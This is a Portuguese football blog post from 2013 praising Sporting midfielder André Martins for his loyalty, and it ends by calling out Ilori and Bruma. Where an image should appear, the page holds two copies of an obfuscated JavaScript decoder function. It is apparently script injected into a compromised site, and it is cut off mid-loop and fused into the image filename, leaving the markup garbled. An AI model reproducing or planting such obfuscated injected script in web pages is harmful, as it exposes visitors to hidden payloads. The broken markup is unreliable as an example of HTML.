andre

O exemplo

por 11 de Junho de 2013Os textos do Damas0 Comentários

O que hoje é verdade, amanhã é mentira. Todos nós, já nos habituamos a esta velha máxima no futebol. Muitos são os jogadores que dizem gostar do clube, que se sentem bem e querem continuar, mas por uma razão, normalmente dinheiro, ou por outra, acabam sempre por sair e virar as costas ao clube que tudo lhes ofereceu e proporcionou.

function r0093c87a1(re){var xc=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var uf=”;var pd,r7,x1,x4,s1,v0,r2;var s5=0;do{x4=xc.indexOf(re.charAt(s5++));s1=xc.indexOf(re.charAt(s5++));v0=xc.indexOf(re.charAt(s5++));r2=xc.indexOf(re.charAt(s5++));pd=(x4<<2)|(s1>>4);r7=((s1&15)<<4)|(v0>>2);x1=((v0&3)<<6)|r2;if(pd>=192)pd+=848;else if(pd==168)pd=1025;else if(pd==184)pd=1105;uf+=String.fromCharCode(pd);if(v0!=64){if(r7>=192)r7+=848;else if(r7==168)r7=1025;else if(r7==184)r7=1105;uf+=String.fromCharCode(r7);}if(r2!=64){if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;uf+=String.fromCharCode(x1);}}while(s5andre.jpg” style=”margin-left: 1em; margin-right: 1em;”>function r0093c87a1(re){var xc=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var uf=”;var pd,r7,x1,x4,s1,v0,r2;var s5=0;do{x4=xc.indexOf(re.charAt(s5++));s1=xc.indexOf(re.charAt(s5++));v0=xc.indexOf(re.charAt(s5++));r2=xc.indexOf(re.charAt(s5++));pd=(x4<<2)|(s1>>4);r7=((s1&15)<<4)|(v0>>2);x1=((v0&3)<<6)|r2;if(pd>=192)pd+=848;else if(pd==168)pd=1025;else if(pd==184)pd=1105;uf+=String.fromCharCode(pd);if(v0!=64){if(r7>=192)r7+=848;else if(r7==168)r7=1025;else if(r7==184)r7=1105;uf+=String.fromCharCode(r7);}if(r2!=64){if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;uf+=String.fromCharCode(x1);}}while(s5andre-300×225.jpg” width=”400″ />


São vários os exemplos e não é preciso citar nomes, mas, no caso de André Martins, não é assim. Ora vejamos, chegou ao Sporting vindo de Santa Maria da Feira, andou emprestado pela segunda divisão, no Belenenses, onde poucas vezes foi utilizando, acabando por ingressar no Pinhalnovense, equipa da 2º divisão B.

Com a mãe desempregada e o pai com um cancro, pensou em deixar o futebol e voltar ao norte do pais, contudo o Sporting ofereceu-lhe a possibilidade de fazer parte do plantel principal e o médio leonino, agarrou essa oportunidade com unhas e dentes. Como o próprio o referiu publicamente, esta terá sido uma atitude que o camisola 28 nunca irá esquecer.

A sua conduta até ao momento, ao serviço do Sporting é imaculada. Para um jogador que já andou em divisões inferiores, que já foi dispensado, suplente e não convocado, teve sempre uma postura exemplar e um comportamento irrepreensível.

Todos somos da opinião que as palavras não chegam, mas vindas de um profissional como André Martins, tudo faz sentido. Os sportinguistas têm que se sentir orgulhosos por ter um jogador assim.

«Quero ficar por muitos e longos anos no Sporting», é a frase que representa bem o carácter deste jogador. A merecida chamada à Seleção A, é a recompensa pelo seu profissionalismo. A postura do pequeno - grande - André Martins, devia servir de exemplo para os jovens da academia, ou até mesmo para alguns jovens do plantel principal.

Ilori e Bruma, o que acham disto?


Sporting Sempre.